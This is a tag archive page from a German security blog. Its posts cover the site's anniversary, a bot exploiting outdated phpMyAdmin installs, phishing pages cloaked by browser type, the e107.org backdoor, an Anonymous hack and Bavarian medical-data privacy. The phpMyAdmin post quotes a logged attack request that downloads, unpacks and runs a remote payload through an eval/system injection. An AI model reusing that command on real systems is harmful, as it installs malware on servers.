Archiv

Artikel Tagged ‘crack’

Vor genau 15 Jahren: ghcif.de erblickt das web

2. März 2013 7 Kommentare

logoSo vergeht die Zeit, mittlerweile sind es 15 Jahre seit dem die Webseiten des ghcif public sind und viele Hoehen und Tiefen sind in dieser Zeit durchlaufen worden.
Ich erinnere mich noch wie aus einem Zusammenschluss von 4 Leuten die Webseite mit einem WYSIWYG Editor zusammengeschraubt worden sind, das erste Logo entstand mit PaintShop Pro und wir hatten nur ein Ziel: Rebellion.

Also musste ein Webspacepaket her, Rootserver waren damals noch unbezahlbar, so aber auch der Space der angemietet wurde, 1GB Webspace inkl CGI und 10 oder 15 Domains, ich bin mir nicht mehr sicher, 1GB heute eine Lachnummer, damals in den Zeiten von Modems und ISDN eine grossartige Sache, ein Name musste her und dieser sollte auch gleich zeigen was es heisst zu rebellieren und ueber die Strenge zu schlagen, Deutsch sollte es sein und alles nur nicht normal und so kam es zum German Hack Crack illegal Force.
Ein Webdesign war schnell gefunden und in den klassischen Farben zusammengeschustert, schwarzer Hintergrund und gruene Schrift, so musste es sein: Mehr…

Massive Hacks durch phpmyadmin Sicherheitsluecke

17. Januar 2012 Keine Kommentare

Seit einigen Tagen haeufen sich die Meldungen ueber gecrackte Server welche Schadsoftware installiert haben, nach einiger Suche konnte der Uebeltaeter ausgemacht werden, es handelt sich um veraltete phpmyadmin Installationen und ein Bot scanned diverse Webs und testet wahllos 2 Exploits:

50.56.100.212 „GET /phpMyAdmin/config/config.inc.php?eval=system(‚echo cd /tmp;wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;curl -O wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;lyxn -DUMP wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl‘);

Mehr…

Geniale Idee nach Cracks Phishinseiten zu verstecken

5. Januar 2012 Keine Kommentare

Eigentlich bin ich nicht der Freund davon derartige Ideen auch noch zu verbreiten, jedoch ist die Idee so genial wie einfach und hilft evtl auch beim Debuggen von Problemen weiter.
Der Sachverhalt der vorliegt ist folgender, ein Kunde meldet das beim Aufruf seiner Seite eine andere Seite erscheint und nicht die, die er aufgerufen hat.
Nehmen wir an es handelt sich um die Seite: www.dummypage.tld, beim Aufruf dieser erscheint jedoch www.phishing.tld.
Ein Test mit einem Browser zeigte jedoch dummypage.tld und nicht die vom Kunden gemeldete Seite, der Test mit Opera Mobile jedoch zeigte auf www.phishing.tld, was passiert hier?
Der Test mit dem Android Browser zeigt wiederum auf dummypage.tld.
Moment!
Ein Klick in den Optionen -> DESKTOP Version aus. Mehr…

Anonymous hacked Paedophilenwebseite

19. Oktober 2011 Keine Kommentare

Anonymous hat zu einem netten Schlag ausgeholt und eine Webseite auf der offensichtlich Paedophile Bild und Videomaterial handeln gecracked.
Bei der Darknet Handel Seite handelt es sich um „Lolita City“ insgesamt wurden die Daten von knapp 1600 Personen – sowie Informationen über den Serverstandort des Forums bekannt gegeben, wie es scheint steht der Server in den USA.
Scheinbar waren die Passwoerter jedoch gesondert gespeichert und via SHA512 Hash gespeichert und inkl. den Klarnamen in einer nicht von Anonymous abgegriffenen Datenbank gespeichert.

Weitere Infos: http://pastebin.com/u/opdarknet

Aerztliche Schweigepflicht in Bayern praktisch aufgehoben

4. Februar 2010 Keine Kommentare

Nun schlaegt es 13 beim Ueberwachungs und Onlinewahn unseres Staates und der Krankenkassen, ich dachte ich lesen nicht richtig als ich den Artikel gelesen habe, in Bayern ist es nun so, dass Notaerzte alle Patientendaten online in eine Formular hacken muessen. Bestehen sie auf der Einhaltung ihrer Schweigepflicht, koennen sie die Behandlung nicht abrechnen! Eine Betroffene Aerztin macht ihrem Aerger Luft:

Ich bin Notärztin in Bayern und wie alle anderen Notärzte haben wir unsere Einsätze mit den üblichen Praxisprogrammen abgerechnet. Unsere Einsätze sind auf einem DIN-A3 Bogen (dem bundeseinheitlichen DIVI-Protokoll) dokumentiert, das hat noch 2 Durchschläge, das Original ist für den Krankenhaus-Kollegen, ein Durchschlag für die eigenen Aufzeichnungen und ein dritter, der eigentlich für QM-Maßnahmen und Auswertungen vorgesehen war und bei dem persönliche Patientendaten bereits geschwärzt sind. Diese Protokolle muss ich 10 Jahre aufbewahren und sie dürfen für Dritte nicht zugänglich sein. An Patienten-Daten bekam die Kassenärztliche Vereinigung Bayerns (KVB) bisher die Versicherungsdaten mit Diagnose zu Abrechnungszwecken.

Ab Januar 2010 soll der Notarzt das gesamte Einsatzprotokoll namentlich in ein WEB-Portal online bei der KVB eintippen. D. h. alle Patientendaten (Krankheitsgeschichte, Blutdruck, Medikamente, durchgeführte Maßnahmen, genaue Einsatzörtlichkeit, Zielklinik etc.) sollen in dieses Portal eingegeben werden. Was dann mit den Daten passiert, kann kein Notarzt mehr beeinflussen, d. h., Missbrauch ist eigentlich Tür und Tor geöffnet. Es sollen verschiedene Zugriffsrechte vergeben sein und somit die Daten „sicher“ sein. Das Ganze dient der „Qualitätssicherung“ und „QM“. (Qualitätsmanagement)

Wer keine Daten eingibt, bekommt für seinen Einsatz auch kein Geld, also arbeitet umsonst. Damit werden die Ärzte also zur Eingabe der Daten zwangsverpflichtet. Die Ärzte werden also meiner Meinung nach zum Bruch ihrer Schweigepflicht genötigt (Die Daten eines Einsatzes gehen normalerweise niemand Dritten etwas an und schon gar nicht online und nicht anonymisiert.)

Und zum anderen ist nicht einmal eine offline Version vorgesehen, d. h., ich muss bei jeder Eingabe online sein. Einen Trojaner oder anderes Ungeziefer kann man als Normal-User doch nie 100% ausschließen, trotzdem soll der Arzt garantieren, dass er „clean“ ist, egal, von welchem Rechner er sich einloggt. Auch können die Daten nur personalisiert eingegeben werden. Angeblich sei das „datenschutzrechtlich“ unbedenklich und der Datenschutzbeauftragte in Bayern hätte nichts dagegen.

Zugangsvoraussetzungen: Computer mit Internetanschluss … Abfrage fürs Log-In: Benutzername/Kennwort und dann noch drei Zahlen/Buchstaben einer „Gridkartentabelle“, also aus einer Tabelle mit Spalten von A-J und Reihen von 1-5, Groß-Kleinschreibung egal

Ueberall werden sensible Daten auf irgendwelchen Servern gespeichert, wie oft das daneben geht ist jedem klar und die Aerztin fragt sich auch wo in aller Welt hier Sicherheit gegeben sein soll, wenn der Benutzername fuer alle Anwender leicht zu merken, aus einer Kombination aus dem Geburtsdatum, den Initialen des Arztes und lediglich wenigen Ziffern besteht?
Wenn niemand weiss was mit den Daten passiert und wer legalen Zugriff auf diese hat, vom illegalen Zugriff einmal ganz zu schweigen.
Wann wacht Deutschland endlich auf?

(Quellen: aerztezeitung
infranken.de)

e107.org cracked, backdoored und nun gefixed?

27. Januar 2010 Keine Kommentare

Mit einer zeitlich zurueckdatierten News meldet sich McFly vom e107 Developer Team und raeumt ein, dass e107.org gecracked wurde und auch das die Version 0.7.17 von einer Backdoor betroffen war, auch wenn der eigentliche Source nie kompromittiert worden ist, wurde hier fuer kurze Zeit eine Version zum Download angeboten welche die Backdoor enthalten hatte.
McFly raeumt auch ein, dass sie sich wohl zu lange Zeit genommen hatten, die Luecke zu patchen, das laesst auf weiteres schliessen, wie Beispielsweise laengere Kenntnis von der Sicherheitsluecke.
Einzelheiten zum Crack oder auch welche Seiten von e107 wie veraendert wurden verschweigt der Entwickler, nicht gerade das was man erwarten oder vielmehr hoffen wuerde, hier muessen Mailinglisten, Blogs und Co fuer Aufklaerung sorgen – wirklich schade.
Der Entwickler hofft nun alle schaedlichen Files entfernt zu haben und alle Spuren des Einbruchs entfernt zu haben.

Wer sich nun fragt wieso ich mich gerade an der Geschichte 3 Posts lang aufhaenge, ist es doch nur ein Beispiel von vielen!? Ja soweit richtig, jedoch war mir einfach danach.

e107.org Backdoor: The story continues

26. Januar 2010 Keine Kommentare

Nachdem hier bereits gestern von einer etwaigen Backdoor in e107 in der Version 0.7.17 berichtet wurde, geht die Geschichte nun weiter.
Scheinbar wurde diese stillschweigend aus den Sourcen entfernt und eine neue Version hochgeladen welche die Backdoor nicht enthaelt und neue Versionen der class2.php aufweist, scheinbar wurde hier in 3 Schritten gepatched, denn die aktuelle Version 0.7.17 unterscheidet sich von der die ich gestern testen konnte, jedoch war die Version die ich in den Haenden halten konnte, nicht die Version, welche das FD Posting enthalten hat.
Nun geht es weiter auf: http://e107.org/news.php finden sich ueber dem Documenttype Javascripts die dort wohl nicht sein sollten in der Form: <a href=’/wiki/docs/html/.store/[Spamtext]-[Number].php‘>spamtext</a>

Andere User berichten von ihren Virenscannern mit Meldungen wie „Virus/Spyware Mal/ObfJS-CB!“
Auch sind weitere Seiten nicht nur die News Seite betroffen.

Von den e107 Entwicklern bisher noch kein Statemen, die Webseite ist nach wie vor online, statt diese offline zu nehmen und etwaige Einbruchsspuren zu entfernen, wird hier im Hintergrund nur leise gefixed?

Update: Ich habe gerade ein Gespraech mit einem e107.org Developer gehabt, hier heisst es: Ja die Luecke ist bekannt, wir haben sie gefixed, was erwartest Du mehr? MS machts nicht besser. Das es sich hierbei um einen Silentpatch handelt interessiert wohl kaum, schliesslich machen andere auch Scheisse, wieso nicht auch im eigenen Laden.
Das nenn ich mal eine Aussage!

Google Cracker ziehlten auf weitere Unternehmen

14. Januar 2010 Keine Kommentare

Der Crackerangriff gegen Google im Dezember ziehlte wohl nicht nur auf Google sondern auch mindestens auf 33 weitere Firmen, unter anderem Finanzinstitutionen um hier Sourcecode zu stehlen wie aus einem Bericht von iDefense hervorgeht.
Die Cracker haben sich hierbei einer 0Day Luecke im Adobe Reader bedient um so Malware auszuliefern und dies scheinbar auch mit Erfolg, welche Kreise der Angriff wirklich betrifft, kann nur erraten werden, denn sicherlich werden hier viele Unternehmen nicht zugeben oder melden was Ihnen hier unterlaufen ist.
Vielleicht aber doch mal ein Wink auf andere Systeme/Programme zu setzen nicht auf den Adobe Reader der in der Vergangenheit ja mehr als einmal negativ aufgefallen ist und das nicht nur durch: „Wir patchen die Luecke in 2-3 Monaten“.

KategorienNews, Security Tags: , , , ,